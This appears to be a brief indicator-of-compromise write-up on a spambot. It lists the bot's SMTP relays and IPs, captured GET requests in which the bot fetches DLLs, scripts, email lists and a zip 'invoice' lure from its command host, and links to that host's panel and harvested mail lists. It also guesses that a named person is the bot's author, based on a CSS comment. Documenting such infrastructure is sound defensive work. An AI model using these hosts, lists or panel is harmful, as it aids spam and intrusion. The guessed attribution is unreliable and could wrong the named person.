Email Spam via these smtp servers :
“cdptpa-pub-iedge-vip.email.rr.com”
“smtp.orange.fr”
“smtp.sina.com”
“smtp.googlemail.com”
“smtp.tiscali.co.uk”
“out.alice.it”
Servers used to spam :
“173.194.195.16:25”
“78.47.198.134:80”
“62.24.139.11:25”
“107.14.166.70:25”
“193.252.22.86:25”
“82.57.200.132:25”
“202.108.6.242:25”
Downloaded files :
“GET /libeay32.dll HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /ssleay32.dll HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /cmd.php HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /go_mails/botid-1761_8542.txt HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /header/name.txt HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
“GET /go_attach/invoice_A5twhy.zip HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)”
Atachments used to spread here : hxxp://78.47.198.134/go_attach/
Emails list here : hxxp://78.47.198.134/go_mails/
Around 1GB mails list here : hxxp://78.47.198.134/header/m.txt
Names used to spam here : hxxp://78.47.198.134/header/name.txt
Login to Bot panel : hxxp://78.47.198.134/index.php
Porbably the guy behind the bot his name is into /style/spamm.css when u open page source from login panel.
Author: Vitaly Voskobovich */
/* Web-site: www.voskobovich.com
Hosting Infos :
http://whois.domaintools.com/78.47.198.134
Anonymous - March 25, 2016 at 6:47 am
post the source of the server